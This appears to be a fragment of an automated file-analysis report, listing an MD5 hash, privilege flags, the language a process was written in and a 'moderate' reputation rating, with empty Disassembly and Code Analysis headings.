                                                                                                        MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate

                                                                                                        Disassembly

                                                                                                        Code Analysis

                                                                                                        Reset < >